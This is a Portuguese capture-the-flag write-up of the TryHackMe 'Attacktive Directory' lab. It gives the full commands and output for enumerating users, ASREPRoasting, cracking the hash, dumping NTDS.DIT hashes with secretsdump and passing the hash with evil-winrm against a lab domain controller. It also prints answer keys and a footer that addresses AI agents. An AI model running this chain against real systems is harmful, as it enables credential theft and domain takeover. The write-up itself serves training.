# Attacktive Directory

## Contexto

Temos o seguinte alvo: um **Controlador de Domínio** (DC) com o endereço IP **10.10.209.6**. O desafio em si também já nos fornece o domínio.

{% hint style="info" %}
**Tipo:** Controlador de Domínio (DC)

**IP:** 10.10.209.6

**Domínio:** spookysec.local
{% endhint %}

## Reconhecimento

Para começarmos o reconhecimento, podemos coletar diversas informações através da ferramenta **Enum4linux**.

```
enum4linux 10.10.209.6
```

```
[...] 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[...]
```

{% hint style="info" %}
**1.** *What tool will allow us to enumerate port 139/445?* **\[enum4linux]**
{% endhint %}

{% hint style="info" %}
**2.** *What is the NetBIOS-Domain Name of the machine?* **\[THM-AD]**
{% endhint %}

{% hint style="info" %}
**3.** *What invalid TLD do people commonly use for their Active Directory Domain?* **\[.LOCAL]**
{% endhint %}

### Enumeração de usuários

Para a próxima tarefa, devemos realizar a enumeração de usuários do domínio através da ferramenta **Kerbrute** (que compõe o conjunto de classes python **Impacket**), utilizando os dicionários de usuários e senhas providos pelo próprio desafio.

Através da flag `-h`, você pode ver as opções válidas e necessárias para descobrir os usuários.

```
/kerbrute -h
```

Executando a enumeração de usuários:

```
./kerbrute userenum --dc 10.10.209.6 -d spookysec.local /usr/share/wordlists/attacktive-directory/userlist.txt
```

```
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 18:26:19 >  Using KDC(s):
2023/01/08 18:26:19 >   10.10.209.6:88

2023/01/08 18:26:20 >  [+] VALID USERNAME:       james@spookysec.local
2023/01/08 18:26:26 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2023/01/08 18:26:39 >  [+] VALID USERNAME:       James@spookysec.local
2023/01/08 18:26:43 >  [+] VALID USERNAME:       robin@spookysec.local
2023/01/08 18:27:31 >  [+] VALID USERNAME:       darkstar@spookysec.local
2023/01/08 18:27:59 >  [+] VALID USERNAME:       administrator@spookysec.local
2023/01/08 18:29:23 >  [+] VALID USERNAME:       backup@spookysec.local
2023/01/08 18:30:03 >  [+] VALID USERNAME:       paradox@spookysec.local
2023/01/08 18:33:50 >  [+] VALID USERNAME:       JAMES@spookysec.local
2023/01/08 18:34:59 >  [+] VALID USERNAME:       Robin@spookysec.local
2023/01/08 18:43:09 >  [+] VALID USERNAME:       Administrator@spookysec.local

```

{% hint style="info" %}
**4.** *What command within Kerbrute will allow us to enumerate valid usernames?* **\[userenum]**
{% endhint %}

{% hint style="info" %}
**5.** *What notable account is discovered?* **\[svc-admin]**
{% endhint %}

{% hint style="info" %}
**6.** *What is the other notable account is discovered?* **\[backup]**
{% endhint %}

## Exploração

Agora que já possuímos vários usuários válidos no domínio, podemos utilizar um ataque de força-bruta. Nesse caso, utilizaremos um ataque chamado **ASREPRoasting**.

> Um ataque ASREPRoasting ocorre quando uma conta de usuário tem o privilégio "Does not require Pre-Authentication" definido. Isso significa que a conta não precisa fornecer uma identificação válida antes de solicitar um ticket Kerberos para a conta de usuário em questão.

Para esse tipo de ataque, utilizaremos outra classe do conjunto Impacket, chamado **GetNPUsers**, que nos permitirá saber as contas suscetíveis a ASREPRoasting presentes no KDC (*Key Distribution Center*). O único requisito para consultar as contas é um conjunto válido de usuários (que já enumeramos via Kerbrute).

```
python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users2.txt -dc-ip 10.10.209.6 spookysec.local/
```

```
Impacket v0.10.1.dev1+20221214.172823.8799a1a2 - Copyright 2022 Fortra

[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:50822f1bbf7182827b71ddbcc8e8067a$81909570e086df06568c0ae7658e6bd2dd3e934c652adfd058f58b457e97a5767f78197a9c6fa1ac403df49eeeabd3582f3e007b2695b3c8829f3b02ee33e4f812768d19c710eb7ce550a15529a8e7b726ed4a6edc6583bb3093a94a7b553cc60e80b36c2954b37448682baf36227f2df69b133d854e29f1d025c27902971e95de3cc56335adc6d03ae14e2a031a98d5743d345226a46e52a78376da35609862b6d06f2d45cbfc9ceda36ae973e72c4de033b3e59301f4b5f3980acecc174281e4d0dc2d965b75ef06910057443d1e26111ad1b485a32555a1029d5521cfa0f3baddb8b386e1d445c2b472eb5ca5bbd3a3db
```

{% hint style="info" %}
**7.** *We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?* **\[svc-admin]**
{% endhint %}

Descobrimos um usuário válido e suscetível a ASREPRoasting. Agora, para quebrar a hash utilizando o dicionário de senhas que salvamos previamente, precisamos descobrir qual o tipo de hash que acabamos de encontrar. Para isso, podemos consultar na lista de hashes do [**Hashcat**](https://hashcat.net/wiki/doku.php?id=example_hashes).

Como existem muitos tipos de hashes Kerberos 5 na lista do Hashcat, devemos analisar minuciosamente o formato da hash para descobrirmos qual modo utilizar em sua quebra.

<figure><img src="/files/q5oXDwqN3fhgyWVXyNmg" alt=""><figcaption><p>Tipo de hash identificado via <code>GetNPUsers.py</code></p></figcaption></figure>

{% hint style="info" %}
**8.** *Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC?* **\[Kerberos 5 AS-REP etype 23]**
{% endhint %}

{% hint style="info" %}
**9.** *What mode is the hash?* **\[18200]**
{% endhint %}

Agora podemos tentar quebrar a hash utilizando o Hashcat.

```
hashcat -m 18200 hash.txt /usr/share/wordlists/attacktive-directory/passwordlist.txt
```

```
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b6fa4c0ae56445ebc248205fe51a2258$399c4cadfb39280a56b80003cdfbf7cf8f73c667cc5fbabad698611853c9d0726ec290a23395c04a343df7a57ab99c36e02f972792b688d9787830a82e7f1505a545484c5c50289142a98449293f26bacc1a57dd691a8eb6c555bc9ccb5b2ef33b23da91128b51e26b1445555991b6d1dc0de7e732e6eed3658ef3c238272e9586f60aa36e58719e23228f205b800091ba9670f5ccb57d3d823143b334529ee1d75ab8946e585612df55b37bd7b94392e4efa64a1dacbac3e23c95862ca7981eaf4b6516b25526b63f93ae1930cf1c0c9aa49c975abff82557186018006edeaa5b7addd211a2c8e09f6a6a6bcf4ec4471f3c:management2005
```

{% hint style="info" %}
**10.** *Now crack the hash with the modified password list provided, what is the user accounts password?* **\[management2005]**
{% endhint %}

Temos uma credencial válida. Utilizando essa credencial, precisamos agora enumerar os shares do servidor, utilizando a clássica ferramenta **SMBClient.**

{% hint style="info" %}
**11.** *What utility can we use to map remote SMB shares?* **\[smbclient]**
{% endhint %}

Executando a seguinte linha de comando, podemos listar os shares ativos:

```
smbclient -L \\\\10.10.209.6 -U spookysec.local/svc-admin
```

```
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backup          Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share
```

{% hint style="info" %}
**12.** *Which option will list shares?* **\[-L]**
{% endhint %}

{% hint style="info" %}
**13.** *How many remote shares is the server listing?* **\[6]**
{% endhint %}

{% hint style="info" %}
**14.** *There is one particular share that we have access to that contains a text file. Which share is it?* **\[backup]**
{% endhint %}

Acessando o share backup com as credenciais que encontramos, conseguimos descobrir um arquivo.

```
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3687835 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
```

```
$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
```

{% hint style="info" %}
**15.** *What is the content of the file?* **\[YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw]**
{% endhint %}

O conteúdo do arquivo parece ser um Base64. Decodificando via linha de comando no Linux, obtivemos o seguinte resultado:

```
$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860
```

{% hint style="info" %}
**16.** *Decoding the contents of the file, what is the full contents?* **\[<backup@spookysec.local>:backup2517860]**
{% endhint %}

## Escalação de Privilégio

Agora que já possuímos acesso ao servidor, podemos tentar elevar nosso privilégio. Pra isso, utilizaremos a ferramenta **secretsdump.py**, também compondo o conjunto Impacket. Se conseguirmos coletar hashes, podemos tentar elevar privilégios utilizando o método **Pass the Hash**.

```
python /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.209.6
```

```
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:1ced74bb19b4fd8a6e0bf41ad102b86f:::
```

{% hint style="info" %}
**17.** *What method allowed us to dump NTDS.DIT?* **\[DRSUAPI]**
{% endhint %}

{% hint style="info" %}
**18.** *What is the Administrators NTLM hash?* **\[0e0363213e37b94221497260b0bcb4fc]**
{% endhint %}

{% hint style="info" %}
**19.** *What method of attack could allow us to authenticate as the user without the password?* **\[Pass the Hash]**
{% endhint %}

A vigésima flag aparentemente nos indica a utilizar a ferramenta **Evil-WinRM**, que se aproveita justamente da falha Pass the Hash.

```
evil-winrm -i 10.10.209.6 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
```

{% hint style="info" %}
**20.** *Using a tool called Evil-WinRM what option will allow us to use a hash?* **\[-H]**
{% endhint %}

Para cumprir a última parte do desafio, precisamos apenas coletar os arquivos de texto presentes na pasta Desktop de cada usuário indicado. Você consegue fazer isso sozinho. :)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://2h4ck.gitbook.io/home/ctf/tryhackme/attacktive-directory.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.